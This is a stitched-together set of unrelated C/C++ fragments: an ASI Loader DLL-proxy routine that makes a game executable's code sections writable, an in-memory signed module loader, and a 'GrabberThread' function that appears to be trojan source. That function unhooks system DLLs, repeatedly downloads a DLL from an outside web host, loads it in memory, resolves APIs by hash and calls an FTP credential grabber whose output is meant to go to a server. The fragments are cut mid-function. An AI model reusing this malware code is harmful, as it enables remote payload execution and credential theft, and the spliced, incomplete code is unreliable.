d3d11.D3DPerformance_EndEvent = GetProcAddress(d3d11.dll, "D3DPerformance_EndEvent");
d3d11.D3DPerformance_GetStatus = GetProcAddress(d3d11.dll, "D3DPerformance_GetStatus");
d3d11.D3DPerformance_SetMarker = GetProcAddress(d3d11.dll, "D3DPerformance_SetMarker");
d3d11.EnableFeatureLevelUpgrade = GetProcAddress(d3d11.dll, "EnableFeatureLevelUpgrade");
d3d11.OpenAdapter10 = GetProcAddress(d3d11.dll, "OpenAdapter10");
d3d11.OpenAdapter10_2 = GetProcAddress(d3d11.dll, "OpenAdapter10_2");
}
else
{
if (_stricmp(DllName + 1, "winmmbase.dll") == NULL) {
winmmbase.dll = LoadLibrary(szSystemPath);
winmmbase.CloseDriver = GetProcAddress(winmmbase.dll, "CloseDriver");
winmmbase.DefDriverProc = GetProcAddress(winmmbase.dll, "DefDriverProc");
winmmbase.DriverCallback = GetProcAddress(winmmbase.dll, "DriverCallback");
winmmbase.DrvGetModuleHandle = GetProcAddress(winmmbase.dll, "DrvGetModuleHandle");
winmmbase.GetDriverModuleHandle = GetProcAddress(winmmbase.dll, "GetDriverModuleHandle");
winmmbase.OpenDriver = GetProcAddress(winmmbase.dll, "OpenDriver");
winmmbase.SendDriverMessage = GetProcAddress(winmmbase.dll, "SendDriverMessage");
winmmbase.auxGetDevCapsA = GetProcAddress(winmmbase.dll, "auxGetDevCapsA");
winmmbase.auxGetDevCapsW = GetProcAddress(winmmbase.dll, "auxGetDevCapsW");
winmmbase.auxGetNumDevs = GetProcAddress(winmmbase.dll, "auxGetNumDevs");
winmmbase.auxGetVolume = GetProcAddress(winmmbase.dll, "auxGetVolume");
winmmbase.auxOutMessage = GetProcAddress(winmmbase.dll, "auxOutMessage");
winmmbase.auxSetVolume = GetProcAddress(winmmbase.dll, "auxSetVolume");
winmmbase.joyConfigChanged = GetProcAddress(winmmbase.dll, "joyConfigChanged");
winmmbase.joyGetDevCapsA = GetProcAddress(winmmbase.dll, "joyGetDevCapsA");
winmmbase.joyGetDevCapsW = GetProcAddress(winmmbase.dll, "joyGetDevCapsW");
winmmbase.joyGetNumDevs = GetProcAddress(winmmbase.dll, "joyGetNumDevs");
winmmbase.joyGetPos = GetProcAddress(winmmbase.dll, "joyGetPos");
winmmbase.joyGetPosEx = GetProcAddress(winmmbase.dll, "joyGetPosEx");
winmmbase.joyGetThreshold = GetProcAddress(winmmbase.dll, "joyGetThreshold");
winmmbase.joyReleaseCapture = GetProcAddress(winmmbase.dll, "joyReleaseCapture");
winmmbase.joySetCapture = GetProcAddress(winmmbase.dll, "joySetCapture");
winmmbase.joySetThreshold = GetProcAddress(winmmbase.dll, "joySetThreshold");
winmmbase.midiConnect = GetProcAddress(winmmbase.dll, "midiConnect");
winmmbase.midiDisconnect = GetProcAddress(winmmbase.dll, "midiDisconnect");
winmmbase.midiInAddBuffer = GetProcAddress(winmmbase.dll, "midiInAddBuffer");
winmmbase.midiInClose = GetProcAddress(winmmbase.dll, "midiInClose");
winmmbase.midiInGetDevCapsA = GetProcAddress(winmmbase.dll, "midiInGetDevCapsA");
winmmbase.midiInGetDevCapsW = GetProcAddress(winmmbase.dll, "midiInGetDevCapsW");
winmmbase.midiInGetErrorTextA = GetProcAddress(winmmbase.dll, "midiInGetErrorTextA");
winmmbase.midiInGetErrorTextW = GetProcAddress(winmmbase.dll, "midiInGetErrorTextW");
winmmbase.midiInGetID = GetProcAddress(winmmbase.dll, "midiInGetID");
winmmbase.midiInGetNumDevs = GetProcAddress(winmmbase.dll, "midiInGetNumDevs");
winmmbase.midiInMessage = GetProcAddress(winmmbase.dll, "midiInMessage");
winmmbase.midiInOpen = GetProcAddress(winmmbase.dll, "midiInOpen");
winmmbase.midiInPrepareHeader = GetProcAddress(winmmbase.dll, "midiInPrepareHeader");
winmmbase.midiInReset = GetProcAddress(winmmbase.dll, "midiInReset");
winmmbase.midiInStart = GetProcAddress(winmmbase.dll, "midiInStart");
winmmbase.midiInStop = GetProcAddress(winmmbase.dll, "midiInStop");
winmmbase.midiInUnprepareHeader = GetProcAddress(winmmbase.dll, "midiInUnprepareHeader");
winmmbase.midiOutCacheDrumPatches = GetProcAddress(winmmbase.dll, "midiOutCacheDrumPatches");
winmmbase.midiOutCachePatches = GetProcAddress(winmmbase.dll, "midiOutCachePatches");
winmmbase.midiOutClose = GetProcAddress(winmmbase.dll, "midiOutClose");
winmmbase.midiOutGetDevCapsA = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsA");
winmmbase.midiOutGetDevCapsW = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsW");
winmmbase.midiOutGetErrorTextA = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextA");
winmmbase.midiOutGetErrorTextW = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextW");
winmmbase.midiOutGetID = GetProcAddress(winmmbase.dll, "midiOutGetID");
winmmbase.midiOutGetNumDevs = GetProcAddress(winmmbase.dll, "midiOutGetNumDevs");
winmmbase.midiOutGetVolume = GetProcAddress(winmmbase.dll, "midiOutGetVolume");
winmmbase.midiOutLongMsg = GetProcAddress(winmmbase.dll, "midiOutLongMsg");
winmmbase.midiOutMessage = GetProcAddress(winmmbase.dll, "midiOutMessage");
winmmbase.midiOutOpen = GetProcAddress(winmmbase.dll, "midiOutOpen");
winmmbase.midiOutPrepareHeader = GetProcAddress(winmmbase.dll, "midiOutPrepareHeader");
winmmbase.midiOutReset = GetProcAddress(winmmbase.dll, "midiOutReset");
winmmbase.midiOutSetVolume = GetProcAddress(winmmbase.dll, "midiOutSetVolume");
winmmbase.midiOutShortMsg = GetProcAddress(winmmbase.dll, "midiOutShortMsg");
winmmbase.midiOutUnprepareHeader = GetProcAddress(winmmbase.dll, "midiOutUnprepareHeader");
winmmbase.midiStreamClose = GetProcAddress(winmmbase.dll, "midiStreamClose");
winmmbase.midiStreamOpen = GetProcAddress(winmmbase.dll, "midiStreamOpen");
winmmbase.midiStreamOut = GetProcAddress(winmmbase.dll, "midiStreamOut");
winmmbase.midiStreamPause = GetProcAddress(winmmbase.dll, "midiStreamPause");
winmmbase.midiStreamPosition = GetProcAddress(winmmbase.dll, "midiStreamPosition");
winmmbase.midiStreamProperty = GetProcAddress(winmmbase.dll, "midiStreamProperty");
winmmbase.midiStreamRestart = GetProcAddress(winmmbase.dll, "midiStreamRestart");
winmmbase.midiStreamStop = GetProcAddress(winmmbase.dll, "midiStreamStop");
winmmbase.mixerClose = GetProcAddress(winmmbase.dll, "mixerClose");
winmmbase.mixerGetControlDetailsA = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsA");
winmmbase.mixerGetControlDetailsW = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsW");
winmmbase.mixerGetDevCapsA = GetProcAddress(winmmbase.dll, "mixerGetDevCapsA");
winmmbase.mixerGetDevCapsW = GetProcAddress(winmmbase.dll, "mixerGetDevCapsW");
winmmbase.mixerGetID = GetProcAddress(winmmbase.dll, "mixerGetID");
winmmbase.mixerGetLineControlsA = GetProcAddress(winmmbase.dll, "mixerGetLineControlsA");
winmmbase.mixerGetLineControlsW = GetProcAddress(winmmbase.dll, "mixerGetLineControlsW");
winmmbase.mixerGetLineInfoA = GetProcAddress(winmmbase.dll, "mixerGetLineInfoA");
winmmbase.mixerGetLineInfoW = GetProcAddress(winmmbase.dll, "mixerGetLineInfoW");
winmmbase.mixerGetNumDevs = GetProcAddress(winmmbase.dll, "mixerGetNumDevs");
winmmbase.mixerMessage = GetProcAddress(winmmbase.dll, "mixerMessage");
winmmbase.mixerOpen = GetProcAddress(winmmbase.dll, "mixerOpen");
winmmbase.mixerSetControlDetails = GetProcAddress(winmmbase.dll, "mixerSetControlDetails");
winmmbase.mmDrvInstall = GetProcAddress(winmmbase.dll, "mmDrvInstall");
winmmbase.mmGetCurrentTask = GetProcAddress(winmmbase.dll, "mmGetCurrentTask");
winmmbase.mmTaskBlock = GetProcAddress(winmmbase.dll, "mmTaskBlock");
winmmbase.mmTaskCreate = GetProcAddress(winmmbase.dll, "mmTaskCreate");
winmmbase.mmTaskSignal = GetProcAddress(winmmbase.dll, "mmTaskSignal");
winmmbase.mmTaskYield = GetProcAddress(winmmbase.dll, "mmTaskYield");
winmmbase.mmioAdvance = GetProcAddress(winmmbase.dll, "mmioAdvance");
winmmbase.mmioAscend = GetProcAddress(winmmbase.dll, "mmioAscend");
winmmbase.mmioClose = GetProcAddress(winmmbase.dll, "mmioClose");
winmmbase.mmioCreateChunk = GetProcAddress(winmmbase.dll, "mmioCreateChunk");
winmmbase.mmioDescend = GetProcAddress(winmmbase.dll, "mmioDescend");
winmmbase.mmioFlush = GetProcAddress(winmmbase.dll, "mmioFlush");
winmmbase.mmioGetInfo = GetProcAddress(winmmbase.dll, "mmioGetInfo");
winmmbase.mmioInstallIOProcA = GetProcAddress(winmmbase.dll, "mmioInstallIOProcA");
winmmbase.mmioInstallIOProcW = GetProcAddress(winmmbase.dll, "mmioInstallIOProcW");
winmmbase.mmioOpenA = GetProcAddress(winmmbase.dll, "mmioOpenA");
winmmbase.mmioOpenW = GetProcAddress(winmmbase.dll, "mmioOpenW");
winmmbase.mmioRead = GetProcAddress(winmmbase.dll, "mmioRead");
winmmbase.mmioRenameA = GetProcAddress(winmmbase.dll, "mmioRenameA");
winmmbase.mmioRenameW = GetProcAddress(winmmbase.dll, "mmioRenameW");
winmmbase.mmioSeek = GetProcAddress(winmmbase.dll, "mmioSeek");
winmmbase.mmioSendMessage = GetProcAddress(winmmbase.dll, "mmioSendMessage");
winmmbase.mmioSetBuffer = GetProcAddress(winmmbase.dll, "mmioSetBuffer");
winmmbase.mmioSetInfo = GetProcAddress(winmmbase.dll, "mmioSetInfo");
winmmbase.mmioStringToFOURCCA = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCA");
winmmbase.mmioStringToFOURCCW = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCW");
winmmbase.mmioWrite = GetProcAddress(winmmbase.dll, "mmioWrite");
winmmbase.sndOpenSound = GetProcAddress(winmmbase.dll, "sndOpenSound");
winmmbase.waveInAddBuffer = GetProcAddress(winmmbase.dll, "waveInAddBuffer");
winmmbase.waveInClose = GetProcAddress(winmmbase.dll, "waveInClose");
winmmbase.waveInGetDevCapsA = GetProcAddress(winmmbase.dll, "waveInGetDevCapsA");
winmmbase.waveInGetDevCapsW = GetProcAddress(winmmbase.dll, "waveInGetDevCapsW");
winmmbase.waveInGetErrorTextA = GetProcAddress(winmmbase.dll, "waveInGetErrorTextA");
winmmbase.waveInGetErrorTextW = GetProcAddress(winmmbase.dll, "waveInGetErrorTextW");
winmmbase.waveInGetID = GetProcAddress(winmmbase.dll, "waveInGetID");
winmmbase.waveInGetNumDevs = GetProcAddress(winmmbase.dll, "waveInGetNumDevs");
winmmbase.waveInGetPosition = GetProcAddress(winmmbase.dll, "waveInGetPosition");
winmmbase.waveInMessage = GetProcAddress(winmmbase.dll, "waveInMessage");
winmmbase.waveInOpen = GetProcAddress(winmmbase.dll, "waveInOpen");
winmmbase.waveInPrepareHeader = GetProcAddress(winmmbase.dll, "waveInPrepareHeader");
winmmbase.waveInReset = GetProcAddress(winmmbase.dll, "waveInReset");
winmmbase.waveInStart = GetProcAddress(winmmbase.dll, "waveInStart");
winmmbase.waveInStop = GetProcAddress(winmmbase.dll, "waveInStop");
winmmbase.waveInUnprepareHeader = GetProcAddress(winmmbase.dll, "waveInUnprepareHeader");
winmmbase.waveOutBreakLoop = GetProcAddress(winmmbase.dll, "waveOutBreakLoop");
winmmbase.waveOutClose = GetProcAddress(winmmbase.dll, "waveOutClose");
winmmbase.waveOutGetDevCapsA = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsA");
winmmbase.waveOutGetDevCapsW = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsW");
winmmbase.waveOutGetErrorTextA = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextA");
winmmbase.waveOutGetErrorTextW = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextW");
winmmbase.waveOutGetID = GetProcAddress(winmmbase.dll, "waveOutGetID");
winmmbase.waveOutGetNumDevs = GetProcAddress(winmmbase.dll, "waveOutGetNumDevs");
winmmbase.waveOutGetPitch = GetProcAddress(winmmbase.dll, "waveOutGetPitch");
winmmbase.waveOutGetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutGetPlaybackRate");
winmmbase.waveOutGetPosition = GetProcAddress(winmmbase.dll, "waveOutGetPosition");
winmmbase.waveOutGetVolume = GetProcAddress(winmmbase.dll, "waveOutGetVolume");
winmmbase.waveOutMessage = GetProcAddress(winmmbase.dll, "waveOutMessage");
winmmbase.waveOutOpen = GetProcAddress(winmmbase.dll, "waveOutOpen");
winmmbase.waveOutPause = GetProcAddress(winmmbase.dll, "waveOutPause");
winmmbase.waveOutPrepareHeader = GetProcAddress(winmmbase.dll, "waveOutPrepareHeader");
winmmbase.waveOutReset = GetProcAddress(winmmbase.dll, "waveOutReset");
winmmbase.waveOutRestart = GetProcAddress(winmmbase.dll, "waveOutRestart");
winmmbase.waveOutSetPitch = GetProcAddress(winmmbase.dll, "waveOutSetPitch");
winmmbase.waveOutSetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutSetPlaybackRate");
winmmbase.waveOutSetVolume = GetProcAddress(winmmbase.dll, "waveOutSetVolume");
winmmbase.waveOutUnprepareHeader = GetProcAddress(winmmbase.dll, "waveOutUnprepareHeader");
winmmbase.waveOutWrite = GetProcAddress(winmmbase.dll, "waveOutWrite");
winmmbase.winmmbaseFreeMMEHandles = GetProcAddress(winmmbase.dll, "winmmbaseFreeMMEHandles");
winmmbase.winmmbaseGetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseGetWOWHandle");
winmmbase.winmmbaseHandle32FromHandle16 = GetProcAddress(winmmbase.dll, "winmmbaseHandle32FromHandle16");
winmmbase.winmmbaseSetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseSetWOWHandle");
}
else
{
if (_stricmp(DllName + 1, "msacm32.dll") == NULL) {
msacm32.dll = LoadLibrary(szSystemPath);
msacm32.acmDriverAddA = GetProcAddress(msacm32.dll, "acmDriverAddA");
msacm32.acmDriverAddW = GetProcAddress(msacm32.dll, "acmDriverAddW");
msacm32.acmDriverClose = GetProcAddress(msacm32.dll, "acmDriverClose");
msacm32.acmDriverDetailsA = GetProcAddress(msacm32.dll, "acmDriverDetailsA");
msacm32.acmDriverDetailsW = GetProcAddress(msacm32.dll, "acmDriverDetailsW");
msacm32.acmDriverEnum = GetProcAddress(msacm32.dll, "acmDriverEnum");
msacm32.acmDriverID = GetProcAddress(msacm32.dll, "acmDriverID");
msacm32.acmDriverMessage = GetProcAddress(msacm32.dll, "acmDriverMessage");
msacm32.acmDriverOpen = GetProcAddress(msacm32.dll, "acmDriverOpen");
msacm32.acmDriverPriority = GetProcAddress(msacm32.dll, "acmDriverPriority");
msacm32.acmDriverRemove = GetProcAddress(msacm32.dll, "acmDriverRemove");
msacm32.acmFilterChooseA = GetProcAddress(msacm32.dll, "acmFilterChooseA");
msacm32.acmFilterChooseW = GetProcAddress(msacm32.dll, "acmFilterChooseW");
msacm32.acmFilterDetailsA = GetProcAddress(msacm32.dll, "acmFilterDetailsA");
msacm32.acmFilterDetailsW = GetProcAddress(msacm32.dll, "acmFilterDetailsW");
msacm32.acmFilterEnumA = GetProcAddress(msacm32.dll, "acmFilterEnumA");
msacm32.acmFilterEnumW = GetProcAddress(msacm32.dll, "acmFilterEnumW");
msacm32.acmFilterTagDetailsA = GetProcAddress(msacm32.dll, "acmFilterTagDetailsA");
msacm32.acmFilterTagDetailsW = GetProcAddress(msacm32.dll, "acmFilterTagDetailsW");
msacm32.acmFilterTagEnumA = GetProcAddress(msacm32.dll, "acmFilterTagEnumA");
msacm32.acmFilterTagEnumW = GetProcAddress(msacm32.dll, "acmFilterTagEnumW");
msacm32.acmFormatChooseA = GetProcAddress(msacm32.dll, "acmFormatChooseA");
msacm32.acmFormatChooseW = GetProcAddress(msacm32.dll, "acmFormatChooseW");
msacm32.acmFormatDetailsA = GetProcAddress(msacm32.dll, "acmFormatDetailsA");
msacm32.acmFormatDetailsW = GetProcAddress(msacm32.dll, "acmFormatDetailsW");
msacm32.acmFormatEnumA = GetProcAddress(msacm32.dll, "acmFormatEnumA");
msacm32.acmFormatEnumW = GetProcAddress(msacm32.dll, "acmFormatEnumW");
msacm32.acmFormatSuggest = GetProcAddress(msacm32.dll, "acmFormatSuggest");
msacm32.acmFormatTagDetailsA = GetProcAddress(msacm32.dll, "acmFormatTagDetailsA");
msacm32.acmFormatTagDetailsW = GetProcAddress(msacm32.dll, "acmFormatTagDetailsW");
msacm32.acmFormatTagEnumA = GetProcAddress(msacm32.dll, "acmFormatTagEnumA");
msacm32.acmFormatTagEnumW = GetProcAddress(msacm32.dll, "acmFormatTagEnumW");
msacm32.acmGetVersion = GetProcAddress(msacm32.dll, "acmGetVersion");
msacm32.acmMetrics = GetProcAddress(msacm32.dll, "acmMetrics");
msacm32.acmStreamClose = GetProcAddress(msacm32.dll, "acmStreamClose");
msacm32.acmStreamConvert = GetProcAddress(msacm32.dll, "acmStreamConvert");
msacm32.acmStreamMessage = GetProcAddress(msacm32.dll, "acmStreamMessage");
msacm32.acmStreamOpen = GetProcAddress(msacm32.dll, "acmStreamOpen");
msacm32.acmStreamPrepareHeader = GetProcAddress(msacm32.dll, "acmStreamPrepareHeader");
msacm32.acmStreamReset = GetProcAddress(msacm32.dll, "acmStreamReset");
msacm32.acmStreamSize = GetProcAddress(msacm32.dll, "acmStreamSize");
msacm32.acmStreamUnprepareHeader = GetProcAddress(msacm32.dll, "acmStreamUnprepareHeader");
}
else
{
if (_stricmp(DllName + 1, "xlive.dll") == NULL)
{
// Unprotect image - make .text and .rdata section writeable
// get load address of the exe
DWORD dwLoadOffset = (DWORD)GetModuleHandle(NULL);
BYTE * pImageBase = reinterpret_cast<BYTE *>(dwLoadOffset);
PIMAGE_DOS_HEADER pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER> (dwLoadOffset);
PIMAGE_NT_HEADERS pNtHeader = reinterpret_cast<PIMAGE_NT_HEADERS> (pImageBase + pDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeader);
for (int iSection = 0; iSection < pNtHeader->FileHeader.NumberOfSections; ++iSection, ++pSection) {
char * pszSectionName = reinterpret_cast<char *>(pSection->Name);
if (!strcmp(pszSectionName, ".text") || !strcmp(pszSectionName, ".rdata")) {
DWORD dwPhysSize = (pSection->Misc.VirtualSize + 4095) & ~4095;
DWORD oldProtect;
DWORD newProtect = (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE;
if (!VirtualProtect(reinterpret_cast <VOID *>(dwLoadOffset + pSection->VirtualAddress), dwPhysSize, newProtect, &oldProtect)) {
ExitProcess(0);
}
}
}
}
else
{
MessageBox(0, "This library isn't supported. Try to rename it to d3d8.dll, d3d9.dll, d3d11.dll, winmmbase.dll, msacm32.dll, dinput8.dll, dsound.dll, vorbisFile.dll, xlive.dll or ddraw.dll.", "ASI Loader", MB_ICONERROR);
ExitProcess(0);
}
}
}
}
}
}
}
}
}
}
}
RPRIVATE_TESTABLE
RBOOL
loadModule
(
rpHCPContext* hcpContext,
rSequence seq
)
{
RBOOL isSuccess = FALSE;
RU32 moduleIndex = (RU32)(-1);
RPU8 tmpBuff = NULL;
RU32 tmpSize = 0;
RPU8 tmpSig = NULL;
RU32 tmpSigSize = 0;
rpal_thread_func pEntry = NULL;
rpHCPModuleContext* modContext = NULL;
OBFUSCATIONLIB_DECLARE( entryName, RP_HCP_CONFIG_MODULE_ENTRY );
OBFUSCATIONLIB_DECLARE( recvMessage, RP_HCP_CONFIG_MODULE_RECV_MESSAGE );
if( NULL != seq &&
NULL != hcpContext )
{
for( moduleIndex = 0; moduleIndex < RP_HCP_CONTEXT_MAX_MODULES; moduleIndex++ )
{
if( 0 == hcpContext->modules[ moduleIndex ].hThread )
{
// Found an empty spot
break;
}
}
}
if( RP_HCP_CONTEXT_MAX_MODULES != moduleIndex &&
(RU32)(-1) != moduleIndex )
{
// We got an empty spot for our module
if( rSequence_getRU8( seq,
RP_TAGS_HCP_MODULE_ID,
&(hcpContext->modules[ moduleIndex ].id ) ) &&
rSequence_getBUFFER( seq,
RP_TAGS_BINARY,
&tmpBuff,
&tmpSize ) &&
rSequence_getBUFFER( seq,
RP_TAGS_SIGNATURE,
&tmpSig,
&tmpSigSize ) &&
CRYPTOLIB_SIGNATURE_SIZE == tmpSigSize )
{
// We got the data, now verify the buffer signature
if( CryptoLib_verify( tmpBuff, tmpSize, getRootPublicKey(), tmpSig ) )
{
// Ready to load the module
rpal_debug_info( "loading module in memory" );
hcpContext->modules[ moduleIndex ].hModule = MemoryLoadLibrary( tmpBuff, tmpSize );
if( NULL != hcpContext->modules[ moduleIndex ].hModule )
{
OBFUSCATIONLIB_TOGGLE( entryName );
pEntry = (rpal_thread_func)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
(RPCHAR)entryName );
OBFUSCATIONLIB_TOGGLE( entryName );
if( NULL != pEntry )
{
modContext = &(hcpContext->modules[ moduleIndex ].context);
modContext->pCurrentId = &( hcpContext->currentId );
modContext->func_sendHome = doSend;
modContext->isTimeToStop = rEvent_create( TRUE );
modContext->rpalContext = rpal_Context_get();
modContext->isOnlineEvent = hcpContext->isCloudOnline;
if( NULL != modContext->isTimeToStop )
{
hcpContext->modules[ moduleIndex ].isTimeToStop = modContext->isTimeToStop;
OBFUSCATIONLIB_TOGGLE( recvMessage );
hcpContext->modules[ moduleIndex ].func_recvMessage =
(rpHCPModuleMsgEntry)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
(RPCHAR)recvMessage );
OBFUSCATIONLIB_TOGGLE( recvMessage );
hcpContext->modules[ moduleIndex ].hThread = rpal_thread_new( pEntry, modContext );
if( 0 != hcpContext->modules[ moduleIndex ].hThread )
{
CryptoLib_hash( tmpBuff, tmpSize, &(hcpContext->modules[ moduleIndex ].hash ) );
hcpContext->modules[ moduleIndex ].isOsLoaded = FALSE;
isSuccess = TRUE;
}
else
{
rpal_debug_warning( "Error creating handler thread for new module." );
}
}
}
else
{
rpal_debug_warning( "Could not find new module's entry point." );
}
}
else
{
rpal_debug_warning( "Error loading module in memory." );
}
}
else
{
rpal_debug_warning( "New module signature invalid." );
}
}
else
{
rpal_debug_warning( "Could not find core module components to load." );
}
// Main cleanup
if( !isSuccess )
{
if( NULL != modContext )
{
IF_VALID_DO( modContext->isTimeToStop, rEvent_free );
}
if( NULL != hcpContext->modules[ moduleIndex ].hModule )
{
MemoryFreeLibrary( hcpContext->modules[ moduleIndex ].hModule );
}
rpal_memory_zero( &(hcpContext->modules[ moduleIndex ] ),
sizeof( hcpContext->modules[ moduleIndex ] ) );
}
}
else
{
rpal_debug_error( "Could not find a spot for new module, or invalid module id!" );
}
return isSuccess;
}
DWORD WINAPI GrabberThread( LPVOID lpData )
{
UnhookDlls();
/*
char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0};
///if ( BotModule != NULL )
{
typedef void ( WINAPI *PVNC_Start )();
HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
DWORD dwSize=GetFileSize(hFile,0);
LPVOID BotModule = MemAlloc(dwSize);
pReadFile(hFile,BotModule,dwSize,&dwSize,0);
pCloseHandle(hFile);
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
PVNC_Start VNC_Start = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" );
///PVNC_Start VNC_Start = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0");
VNC_Start();
while (true) pSleep(1);
MemoryFreeLibrary( hLib );
MemFree( BotModule );
return 1;
}
*/
//link.txt
//
char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/};
LPVOID BotModule = NULL;
bool bKnock = false;
while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
typedef char * ( WINAPI *PFTPGRAB )();
char GrabFTP[] = {'S','c','a','n','1', 0 };
char Ole32[] = {'o','l','e','3','2','.','d','l','l', 0};
typedef void ( WINAPI *PCoUninitialize )();
typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved );
PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D );
PCoInitialize pCoInitialize_ = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF );
pCoUninitialize_();
pCoInitialize_( NULL );
PFTPGRAB FtpGrabber = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP );
char *Buffer = FtpGrabber();
DWORD dwSize = m_lstrlen( Buffer );
if ( dwSize != 0 )
{
Buffer[ dwSize ] = '\0';
bool Sended = false;
do
{
// Отправляем данные на сервер
Sended = true;
if (!Sended)
pSleep( 1000 );
}
while (!Sended);
}
MemoryFreeLibrary( hLib );
MemFree( Buffer );
MemFree( BotModule );
}
